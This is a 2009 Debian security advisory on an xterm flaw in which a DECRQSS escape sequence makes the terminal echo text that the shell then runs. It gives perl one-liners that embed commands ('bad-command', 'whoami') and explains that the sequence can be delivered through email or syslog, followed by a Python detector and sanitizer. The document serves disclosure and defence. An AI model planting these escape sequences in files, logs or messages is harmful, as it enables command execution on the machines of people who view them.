
debianxterm-weakness.txt

Posted on 07 January 2009

Package: xterm
Version: 222-1etch2
Severity: grave
Tags: security patch
Justification: user security hole

DECRQSS Device Control Request Status String "DCS $ q" simply echoes (responds with) invalid commands. For example,

    perl -e 'print "\eP\$q\nbad-command\n\e\\"'

would run bad-command.

Exploitability is the same as for the "window title reporting" issue in DSA-380: include the DCS string in an email message to the victim, or arrange to have it in syslog to be viewed by root.

Original: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030

Test:

    perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
    cat bla.log

If whoami gets executed you should update. So stop using cat or more ;)

Rembrandt
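A defender-side check for the issue described above, as an added example that is not part of the original report: it scans untrusted bytes (a log file, a mail body) for DCS strings carrying a DECRQSS request and renders the data with control bytes escaped, so it can be inspected without the terminal interpreting it. The function names, the sample log and the placeholder payload are constructed for illustration.

```python
import re

# DCS introducer: 7-bit "ESC P" or the 8-bit C1 byte 0x90.
# String terminator (ST): 7-bit "ESC \" or the 8-bit C1 byte 0x9c.
# An unterminated DCS (runs to end of data) is matched too.
DCS_RE = re.compile(rb'(?:\x1bP|\x90)(.*?)(?:\x1b\\|\x9c|\Z)', re.DOTALL)

def find_decrqss(data: bytes):
    """Return (offset, payload) for each DCS string whose body starts with '$q'."""
    hits = []
    for m in DCS_RE.finditer(data):
        body = m.group(1)
        if body.startswith(b'$q'):          # DECRQSS: "DCS $ q <text> ST"
            hits.append((m.start(), body[2:]))
    return hits

def sanitize(data: bytes) -> str:
    """Escape every byte a terminal could interpret; keep printable ASCII, tab, newline."""
    out = []
    for b in data:
        if b in (0x09, 0x0a) or 0x20 <= b < 0x7f:
            out.append(chr(b))
        else:
            out.append('\\x%02x' % b)       # e.g. ESC becomes the text \x1b
    return ''.join(out)

# Constructed sample: one ordinary syslog-style line and one line that
# embeds a DECRQSS request with a harmless placeholder as its payload.
SAMPLE = (
    b'Jan  7 10:00:01 host sshd[1]: session opened\n'
    b'Jan  7 10:00:02 host app: \x1bP$q\nPLACEHOLDER-COMMAND\n\x1b\\\n'
)

if __name__ == '__main__':
    for offset, payload in find_decrqss(SAMPLE):
        print('DECRQSS at byte %d, payload %r' % (offset, payload))
    print(sanitize(SAMPLE))
```

Viewing the `sanitize()` output instead of the raw file shows the sequence as literal `\x1bP$q` text, which is safe on both patched and unpatched terminals.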

 
